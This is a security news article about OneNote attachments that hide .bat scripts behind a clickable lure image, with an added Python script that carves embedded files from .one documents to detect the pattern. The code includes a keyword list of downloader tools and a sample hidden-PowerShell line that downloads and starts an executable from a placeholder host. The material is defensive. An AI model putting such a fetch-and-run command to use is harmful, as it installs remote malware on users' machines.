Malicious code is most often spread as an attachment to spam e-mail. More observant users can often tell at first glance that an attachment is malware, because it has an executable extension such as .exe or .bat, which marks it as a Windows program or batch script.
Security experts warn users never to run such programs unless they are sure of their origin, contents and purpose.
The malware detected as Agent.PLI, however, is different: it arrives with an entirely different file extension, so users may not recognize it as malicious code at first glance at all. “Here we see a new trend in attack campaigns – sending OneNote note documents that contain malicious scripts,” warned Martin Jirkal, head of the analytical team at Eset’s Prague branch.
“Agent.PLI appeared most often as a shared document named Invoice 575367.bat. Attackers are probably trying this method because of the tightening of rules for sending e-mail attachments, and they are looking for ways to bypass this restriction,” Jirkal stated.
A very simple attack
Overall, the attack was very simple. “A note document with a .one extension embedded several malicious .bat scripts, which were overlaid with an image. The image prompted the user to click to open the document. Clicking on the image launched one of the malicious scripts, which began downloading additional malware to the device, most often from the Qbot, IceId, AgentTesla or RedLine families,” the security expert said of the course of the attack.
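The attack described above stores both the lure image and the .bat scripts as embedded file objects inside the .one document, which is what makes a content-based triage possible. The following Python script is an added example, not code from Eset or from the article: it carves every FileDataStoreObject (the container MS-ONESTORE uses for embedded files, recognizable by the header GUID BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC followed by a 64-bit length field) out of a .one file and classifies each payload by its content rather than by any file name, flagging a document that pairs an image with a script or executable. The sample .one blob is constructed inline to the documented layout and is not a real malware sample; the script-marker list and the verdict logic are this example's own assumptions.

```python
"""Carve and triage files embedded in a OneNote (.one) document (added example).

Embedded files live in FileDataStoreObject structures (MS-ONESTORE 2.6.13):
    guidHeader (16) | cbLength (uint64 LE) | unused (4) | reserved (8) | FileData | guidFooter (16)
"""
import struct
import sys
from dataclasses import dataclass

# {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} and {71FBA722-0F79-4A0B-BB13-899256426B24}
# in on-disk (mixed little-endian) GUID byte order.
FILE_DATA_HEADER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")
FILE_DATA_FOOTER = bytes.fromhex("22a7fb71790f0b4abb13899256426b24")
HEADER_LEN = 16 + 8 + 4 + 8  # bytes from guidHeader to the start of FileData

# Assumed heuristic: tokens that mark a text payload as a Windows script or downloader.
SCRIPT_MARKERS = (b"@echo", b"powershell", b"cmd.exe", b"wscript", b"cscript",
                  b"mshta", b"rundll32", b"certutil", b"bitsadmin", b"curl ", b"start ")


@dataclass
class EmbeddedFile:
    offset: int   # offset of guidHeader within the .one blob
    size: int     # cbLength
    kind: str     # content-derived classification
    data: bytes


def classify(data: bytes) -> str:
    """Classify by content: the object carries no trustworthy extension, so names are ignored."""
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "image/png"
    if data.startswith(b"\xff\xd8\xff"):
        return "image/jpeg"
    if data.startswith(b"GIF8"):
        return "image/gif"
    if data.startswith(b"MZ"):
        return "pe-executable"
    head = data[:4096]
    try:
        head.decode("utf-8")
    except UnicodeDecodeError:
        return "binary"
    if any(m in head.lower() for m in SCRIPT_MARKERS):
        return "script"
    return "text"


def carve_embedded_files(blob: bytes) -> list[EmbeddedFile]:
    """Scan for every FileDataStoreObject header and slice out its FileData."""
    found = []
    pos = blob.find(FILE_DATA_HEADER)
    while pos != -1:
        start = pos + HEADER_LEN
        if start <= len(blob):
            (length,) = struct.unpack_from("<Q", blob, pos + 16)
            if length <= len(blob) - start:  # reject truncated or bogus lengths
                data = blob[start:start + length]
                found.append(EmbeddedFile(pos, length, classify(data), data))
        pos = blob.find(FILE_DATA_HEADER, pos + 1)
    return found


def triage(blob: bytes) -> dict:
    """Verdict: an image lure next to a script/executable is the pattern the article describes."""
    files = carve_embedded_files(blob)
    scripts = sum(f.kind in ("script", "pe-executable") for f in files)
    images = sum(f.kind.startswith("image/") for f in files)
    if scripts and images:
        verdict = "suspicious: image lure with embedded script/executable"
    elif scripts:
        verdict = "suspicious: embedded script/executable"
    else:
        verdict = "no embedded scripts or executables"
    return {"files": files, "scripts": scripts, "images": images, "verdict": verdict}


def build_file_data_object(payload: bytes) -> bytes:
    """Wrap a payload in the FileDataStoreObject layout (used only to build the sample)."""
    return (FILE_DATA_HEADER + struct.pack("<Q", len(payload)) + bytes(4) + bytes(8)
            + payload + FILE_DATA_FOOTER)


# Constructed sample: not a real .one file or malware, just the two embedded objects the
# article describes (a lure image and a .bat downloader) surrounded by filler bytes.
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + bytes(40)
FAKE_BAT = (b"@echo off\r\n"
            b"powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
            b"'http://example.invalid/update.exe','%TEMP%\\u.exe')\"\r\n"
            b"start %TEMP%\\u.exe\r\n")
SAMPLE_ONE = (bytes(64) + build_file_data_object(FAKE_PNG) + bytes(32)
              + build_file_data_object(FAKE_BAT) + bytes(16))

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_ONE
    result = triage(blob)
    for f in result["files"]:
        print(f"offset=0x{f.offset:x} size={f.size} kind={f.kind}")
    print(result["verdict"])
```

Run it with a path to a .one attachment to list every embedded object and its content type; with no argument it runs on the constructed sample. Because the extension shown to the user ("Invoice 575367.bat") is just metadata, a mail gateway or sandbox check should work the way this script does and look at what the embedded bytes actually are.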
According to him, it is evident that cybercriminals will be keen this year to reassess their current strategies and invest in new types of attacks. “Although attacks using OneNote are currently on the wane, and thus appear not to have been successful, the principle behind this strategy could certainly resurface,” Jirkal noted.
It follows that users should be wary of more than one type of file in spam e-mails: malicious code can hide in attachments other than those ending in .exe or .bat, including note documents that are not programs themselves but carry embedded scripts.